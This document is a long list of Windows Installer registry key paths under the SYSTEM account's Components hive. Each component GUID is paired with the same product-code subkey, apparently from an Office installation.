HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EF4C66610A677C651A5662C06FC190A6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8D062C44A38EAED50A38439051505F55
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8D062C44A38EAED50A38439051505F55\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B73DE97D108C6785096CF3DAB45C44A3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B73DE97D108C6785096CF3DAB45C44A3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\16DA2803501AF455B80B67A72D22DEA8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\16DA2803501AF455B80B67A72D22DEA8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FD6E0831607A0C5598F31849F69CB863
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FD6E0831607A0C5598F31849F69CB863\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B090A89321164895E938DA97A56A8D5F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B090A89321164895E938DA97A56A8D5F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\30D6941B29649EF5DA0B34401693002C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\30D6941B29649EF5DA0B34401693002C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\07472094AFE46865D940D900F46D7BDA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\07472094AFE46865D940D900F46D7BDA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B92AC20CA838D475293A24B0F51FD792
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B92AC20CA838D475293A24B0F51FD792\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5FC7C44161F67B95D8336DE47298DA07
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5FC7C44161F67B95D8336DE47298DA07\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D0592C5ECE49635CADADDC8FD0B1498
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D0592C5ECE49635CADADDC8FD0B1498\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37313F01615007C5A8075440C2E97605
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37313F01615007C5A8075440C2E97605\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\41F9B06F249F8E8599D3CDEDA60C7651
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\41F9B06F249F8E8599D3CDEDA60C7651\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AAF7863A685010E5B8A2627C72CE5645
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AAF7863A685010E5B8A2627C72CE5645\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2B1E09C07667E1A588A549AA70DDCA1F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2B1E09C07667E1A588A549AA70DDCA1F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2AEF369D013F3035EBC6E8E9945A25E8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2AEF369D013F3035EBC6E8E9945A25E8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9EF9CF16EFE962058A91C4F0CAA4B6DC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9EF9CF16EFE962058A91C4F0CAA4B6DC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D9563900FE5F555696F69BD99C2EEB5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D9563900FE5F555696F69BD99C2EEB5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D0AA8FC366AA43B578E8DCC5C514BBBE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D0AA8FC366AA43B578E8DCC5C514BBBE\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\76066541C7AB9E853B4B6D18A0123E7E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\76066541C7AB9E853B4B6D18A0123E7E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2CE5958D79202CD59B8E69632C2F165F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2CE5958D79202CD59B8E69632C2F165F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AC70E22AB55F6725387D66AAF60A6C6D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AC70E22AB55F6725387D66AAF60A6C6D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4FA8133CAD81A175BA9A01B6AE4F397E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4FA8133CAD81A175BA9A01B6AE4F397E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3F59FA8BF4B969D5CBD7DB9D773C0180
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3F59FA8BF4B969D5CBD7DB9D773C0180\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\14969EE7015C91B5896BAB073215319F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\14969EE7015C91B5896BAB073215319F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D38A70E09612CFA5F898486ABED82104
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D38A70E09612CFA5F898486ABED82104\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5D5A6E55E778CFD5B8ADFD060B6F5ACF
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5D5A6E55E778CFD5B8ADFD060B6F5ACF\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\498CC9A7964F378568B1B16003CC8FCD
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\498CC9A7964F378568B1B16003CC8FCD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\303C355DDA357BD5F96B6B79F634E458
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\303C355DDA357BD5F96B6B79F634E458\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6F03356F73A8DFB57BACF229D50C11E9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6F03356F73A8DFB57BACF229D50C11E9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1BCC2D1CE75EE435CB3FE2372F6EE2F0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1BCC2D1CE75EE435CB3FE2372F6EE2F0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BADFEDDF52757F659BFB46688B23878D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BADFEDDF52757F659BFB46688B23878D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DE9AA6C6E65B4CA569D21050CEBAA97C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DE9AA6C6E65B4CA569D21050CEBAA97C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1E23914D1FC336C55B04B5B14B162745
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1E23914D1FC336C55B04B5B14B162745\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5A26081723D324858AA44F84529A1FF5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5A26081723D324858AA44F84529A1FF5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B5C6A00B7CDA2D956ADCC632A03BC582
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B5C6A00B7CDA2D956ADCC632A03BC582\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DC81054894C739F5E8F1C570F83ACAC3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DC81054894C739F5E8F1C570F83ACAC3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D41DE2E4E37A6AA58A13AE7610FA840B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D41DE2E4E37A6AA58A13AE7610FA840B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3E9A5B8B9E321B755A2F8D46B38EBD19
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3E9A5B8B9E321B755A2F8D46B38EBD19\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2656786E68DF6A5EA68C5544370BFB9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2656786E68DF6A5EA68C5544370BFB9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\75E1E7391CCDE585C8402A3495AB93B9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\75E1E7391CCDE585C8402A3495AB93B9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DFB32EF00ECDFED588E8FEA13B4368E7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DFB32EF00ECDFED588E8FEA13B4368E7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\54CBBE5C255DA6457843503A8ED61F78
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\54CBBE5C255DA6457843503A8ED61F78\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F42A44DCD7760CE50846DA6A72E5C79C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F42A44DCD7760CE50846DA6A72E5C79C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AA2C515FAEDCE9D5BB659048B0B6AF44
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AA2C515FAEDCE9D5BB659048B0B6AF44\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F7A2736027814E451B7FE0B228BE5F93
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F7A2736027814E451B7FE0B228BE5F93\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A83CF6BA9BA77CF53AF6E524D189CF85
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A83CF6BA9BA77CF53AF6E524D189CF85\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5CA170E078EF9153BC926846308E031
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5CA170E078EF9153BC926846308E031\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D5CE80FB5AC2CF65FA8E9630A307B827
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D5CE80FB5AC2CF65FA8E9630A307B827\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D79D6593391AD152AB8B27CA2AFD46C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D79D6593391AD152AB8B27CA2AFD46C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C40BD26AE79233E55A8EB8895537A817
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C40BD26AE79233E55A8EB8895537A817\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FE79B46EDF7C68054BD47FAA669C0F6A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FE79B46EDF7C68054BD47FAA669C0F6A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\56840192274C3E455910A23F2CAFA486
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\56840192274C3E455910A23F2CAFA486\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3A0924178557BC557B864BAAA1B8BBD2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3A0924178557BC557B864BAAA1B8BBD2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C671DA123A623AF51B38878992340DC5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C671DA123A623AF51B38878992340DC5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7C926ACEBB54B1A548CED3DEE1FE43CA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7C926ACEBB54B1A548CED3DEE1FE43CA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1BBFA2820115E9A568FF98C2947F08BF
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1BBFA2820115E9A568FF98C2947F08BF\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F1B1D222E9023DA5BB72C108F38F4351
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F1B1D222E9023DA5BB72C108F38F4351\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\05AEA06B791154F5EB3682D3FC6E28A3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\05AEA06B791154F5EB3682D3FC6E28A3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DA214CC0B2081C8518A830C140598507
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DA214CC0B2081C8518A830C140598507\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D38DBC2F4E8327E5EB218D2D922CC84B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D38DBC2F4E8327E5EB218D2D922CC84B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BF7D1AC5A810B5E56A7BB563F21C398F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BF7D1AC5A810B5E56A7BB563F21C398F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\179C7CA5F08553450A919BC11A199D4D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\179C7CA5F08553450A919BC11A199D4D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6FECD210EDB5CE75D8E6FD5618273106
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6FECD210EDB5CE75D8E6FD5618273106\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A3BF3C3D202AAEC5E9A6626E6D8CD6DD
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A3BF3C3D202AAEC5E9A6626E6D8CD6DD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BDBBC17C23110AF51AE6666C048FC9A2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BDBBC17C23110AF51AE6666C048FC9A2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5995A00B683849C5FB7FA38711D2B628
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5995A00B683849C5FB7FA38711D2B628\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\88EA05FA683CDBA54BC53CED21517555
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\88EA05FA683CDBA54BC53CED21517555\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D0A13E5B9DA24B75D88CC563247C4077
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D0A13E5B9DA24B75D88CC563247C4077\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1AEB9CEAEA7409D52A08E698D9F5545E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1AEB9CEAEA7409D52A08E698D9F5545E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D9FB2AE326A9D495EBCE17FD21B49DB3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D9FB2AE326A9D495EBCE17FD21B49DB3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D494A43550B63E5D90DBB12FD7B52C2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D494A43550B63E5D90DBB12FD7B52C2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\99817C233AF4D0D54BF2551DFAF35BDC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\99817C233AF4D0D54BF2551DFAF35BDC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\746512AEFC6122D5084C6A88B1C9F29C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\746512AEFC6122D5084C6A88B1C9F29C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A22659CCEF48A8F5AB5DF0571E461EFD
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A22659CCEF48A8F5AB5DF0571E461EFD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\38A470AC7F2132F50813B9770ED5B261
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\38A470AC7F2132F50813B9770ED5B261\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3082592211BE5A4549CADB2E6FD2353A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3082592211BE5A4549CADB2E6FD2353A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A21AC394AA15FC45BADAFC29C81786E5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A21AC394AA15FC45BADAFC29C81786E5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\16A5C9F62BAE1B850BDF92BE8BDC065E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\16A5C9F62BAE1B850BDF92BE8BDC065E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\176504F99FFFA535B83859A366DFA00E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\176504F99FFFA535B83859A366DFA00E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7A6D8B24B85E9325D9652DD32F585ADF
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7A6D8B24B85E9325D9652DD32F585ADF\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4B279B718842E43558F5A76E8CD91FD5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4B279B718842E43558F5A76E8CD91FD5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B813605A9EA4C455CABB7CB6C6E9130A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B813605A9EA4C455CABB7CB6C6E9130A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\67D2EC8CFC167525A94A5BC7E144333A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\67D2EC8CFC167525A94A5BC7E144333A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A3D9FF2344277A25A9D9B89D63AAE861
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A3D9FF2344277A25A9D9B89D63AAE861\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4239D8B225FD17359ADB4DD186E034CA
